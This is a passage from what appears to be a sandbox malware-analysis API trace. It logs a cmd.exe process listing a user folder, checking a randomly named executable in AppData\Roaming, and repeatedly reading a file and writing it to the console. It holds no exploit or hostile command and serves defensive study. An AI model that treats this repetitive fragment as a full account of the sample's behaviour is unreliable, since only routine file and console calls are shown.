(lpFileName="C:\\Users\\Default\\Contacts" (normalized: "c:\\users\\default\\contacts")) returned 0x11 [0209.437] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0209.437] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0209.437] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 0x20 [0209.438] FindNextFileW (in: hFindFile=0x442c78, lpFindFileData=0x4435e4 | out: lpFindFileData=0x4435e4) returned 0 [0209.438] GetLastError () returned 0x12 [0209.438] FindClose (in: hFindFile=0x442c78 | out: hFindFile=0x442c78) returned 1 [0209.440] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0209.440] GetConsoleTitleW (in: lpConsoleTitle=0x2cf7c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0209.440] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] GetFileType (hFile=0x50) returned 0x1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] GetFileType (hFile=0x50) returned 0x1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.442] GetFileType (hFile=0x50) returned 0x1 [0209.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.444] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.444] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.445] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.445] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.446] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.446] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.447] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.447] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.448] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.448] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.449] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.449] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] GetFileType (hFile=0x50) returned 0x1 [0209.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.450] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.450] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.450] SetFilePointerEx (in: hFile=0x58, 